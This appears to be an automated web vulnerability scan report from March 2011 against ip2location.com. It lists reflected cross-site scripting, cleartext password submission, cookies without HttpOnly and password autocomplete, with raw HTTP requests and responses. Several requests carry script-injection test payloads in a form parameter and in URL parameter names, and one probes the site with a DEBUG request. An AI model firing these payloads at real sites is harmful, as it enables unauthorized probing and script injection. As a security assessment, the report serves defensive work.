1. Cross-site scripting (reflected)
1.1. http://www.ip2location.com/demo.aspx [ipaddresses parameter]
1.2. http://www.ip2location.com/ib1/ [name of an arbitrarily supplied request parameter]
1.3. http://www.ip2location.com/ib2/ [name of an arbitrarily supplied request parameter]
2. Cleartext submission of password
3. Cookie without HttpOnly flag set
3.1. http://www.ip2location.com/
3.2. http://www.ip2location.com/default.aspx
3.3. http://www.ip2location.com/docs/style.css
4. Password field with autocomplete enabled
Severity: | High |
Confidence: | Certain |
Host: | http://www.ip2location |
Path: | /demo.aspx |
POST /demo.aspx HTTP/1.1 Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://ezooms.com/ Cache-Control: max-age=0 Origin: http://ezooms.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId Content-Length: 35 ipaddresses=e0584<script>alert(1)< |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 55684 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Date: Mon, 21 Mar 2011 01:38:56 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Free Product Demo, Tools and Sample Databases</title> <meta content="IP2Location ...[SNIP]... <span id="lblMessage" class="fontgraysmall">e0584<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ip2location |
Path: | /ib1/ |
GET /ib1/?f3e67"><script>alert(1)< Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://www.ip2location User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 302 Found Date: Mon, 21 Mar 2011 01:39:05 GMT Server: Microsoft-IIS/6.0 Location: http://tools.ip2location Content-Length: 264 Content-type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1><p>The document has moved <a href="http://tools ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ip2location |
Path: | /ib2/ |
GET /ib2/?37104"><script>alert(1)< Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://www.ip2location User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 302 Found Date: Mon, 21 Mar 2011 01:39:05 GMT Server: Microsoft-IIS/6.0 Location: http://tools.ip2location Content-Length: 264 Content-type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1><p>The document has moved <a href="http://tools ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ip2location |
Path: | /login.aspx |
GET /login.aspx HTTP/1.1 Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://www.ip2location User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 39706 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Date: Mon, 21 Mar 2011 01:39:09 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>Login Page</title> <meta name="description" content="Please login to download the latest IP2Location&tra ...[SNIP]... <body> <form name="Form1" method="post" action="login.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" value="dDwxOTY1MDU3O ...[SNIP]... <td> <input name="txtPassword" type="password" id="txtPassword" class="input5" /><FONT color=#ff0000> ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.ip2location |
Path: | / |
GET / HTTP/1.1 Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://ezooms.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64917 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Set-Cookie: URLReferral=http://ezooms Set-Cookie: customerreferer Set-Cookie: firstvisit=firstvisit Date: Mon, 21 Mar 2011 01:38:19 GMT <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <title>IP Address Geolocation to Identify Website Visitor's Geographical Location</title> <link rel="alternate" ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.ip2location |
Path: | /default.aspx |
GET /default.aspx HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.ip2location.com |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Set-Cookie: firstvisit=firstvisit Date: Mon, 21 Mar 2011 01:41:16 GMT <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <title>IP Address Geolocation to Identify Website Visitor's Geographical Location</title> <link rel="alternate" ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.ip2location |
Path: | /docs/style.css |
GET /docs/style.css HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.ip2location.com |
HTTP/1.1 302 Found Date: Mon, 21 Mar 2011 01:41:15 GMT Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Location: /default.aspx Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 850 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href='/default.aspx'>here </body></html> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTM ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ip2location |
Path: | /login.aspx |
GET /login.aspx HTTP/1.1 Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://www.ip2location User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 39706 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Date: Mon, 21 Mar 2011 01:39:09 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>Login Page</title> <meta name="description" content="Please login to download the latest IP2Location&tra ...[SNIP]... <body> <form name="Form1" method="post" action="login.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" value="dDwxOTY1MDU3O ...[SNIP]... <td> <input name="txtPassword" type="password" id="txtPassword" class="input5" /><FONT color=#ff0000> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.ip2location |
Path: | /Default.aspx |
DEBUG /Default.aspx HTTP/1.0 Host: www.ip2location.com Command: start-debug |
HTTP/1.1 401 Unauthorized Connection: close Date: Mon, 21 Mar 2011 01:38:20 GMT Server: Microsoft-IIS/6.0 WWW-Authenticate: Negotiate WWW-Authenticate: NTLM X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39 Debug access denied to '/Default.aspx'. |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.ip2location |
Path: | / |
GET / HTTP/1.1 Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://ezooms.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64917 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Set-Cookie: URLReferral=http://ezooms Set-Cookie: customerreferer Set-Cookie: firstvisit=firstvisit Date: Mon, 21 Mar 2011 01:38:19 GMT <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <title>IP Address Geolocation to Identify Website Visitor's Geographical Location</title> <link rel="alternate" type="application/rss+xml <meta name="description" content="IP2Location.com IP Address Geolocation to Country, City, Region, Latitude, Longitude, ZIP Code, ISP, Domain Name, Timezone, NetSpeed, IDD, Country Code, Area Code, Weather Station Code and Weather Station Name Database"> <meta name="keywords" content="ip address, geolocation, country, city, region, latitude, longitude, ZIP code, ISP, domain name, timezone, netspeed, IDD, country code, area code, weather station code, weather station name"> <meta name="google-site <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <form name="Form1" method="post" action="Default.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" value="dDwyMTEzNTQ2M ...[SNIP]... |
GET / HTTP/1.1 Host: www.ip2location.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 64917 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Set-Cookie: firstvisit=firstvisit Date: Mon, 21 Mar 2011 01:38:21 GMT <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <title>IP Address Geolocation to Identify Website Visitor's Geographical Location</title> <link rel="alternate" type="application/rss+xml <meta name="description" content="IP2Location.com IP Address Geolocation to Country, City, Region, Latitude, Longitude, ZIP Code, ISP, Domain Name, Timezone, NetSpeed, IDD, Country Code, Area Code, Weather Station Code and Weather Station Name Database"> <meta name="keywords" content="ip address, geolocation, country, city, region, latitude, longitude, ZIP code, ISP, domain name, timezone, netspeed, IDD, country code, area code, weather station code, weather station name"> <meta name="google-site <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <form name="Form1" method="post" action="Default.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" value="dDwyMTEzNTQ2M ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ip2location |
Path: | /demo.aspx |
POST /demo.aspx HTTP/1.1 Host: www.ip2location.com Proxy-Connection: keep-alive Referer: http://ezooms.com/ Cache-Control: max-age=0 Origin: http://ezooms.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId Content-Length: 35 ipaddresses=&submit.x=26 |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 55312 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 1.1.4322 Date: Mon, 21 Mar 2011 01:38:45 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Free Product Demo, Tools and Sample Databases</title> <meta content="IP2Location ...[SNIP]... <!-- //Pop up information box II (Mike McGrath (mike_mcgrath@lineone.net, http://website.lineone //Permission granted to Dynamicdrive.com to include script in archive //For this and 100's more DHTML scripts, visit http://dynamicdrive.com Xoffset=2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ip2location |
Path: | / |
GET /robots.txt HTTP/1.0 Host: www.ip2location.com |
HTTP/1.1 200 OK Content-Length: 24 Content-Type: text/plain Last-Modified: Mon, 20 Dec 2010 08:17:00 GMT Accept-Ranges: bytes ETag: "98c25f461ea0cb1:8c4" Server: Microsoft-IIS/6.0 Date: Mon, 21 Mar 2011 01:38:19 GMT Connection: close User-agent: * Disallow: |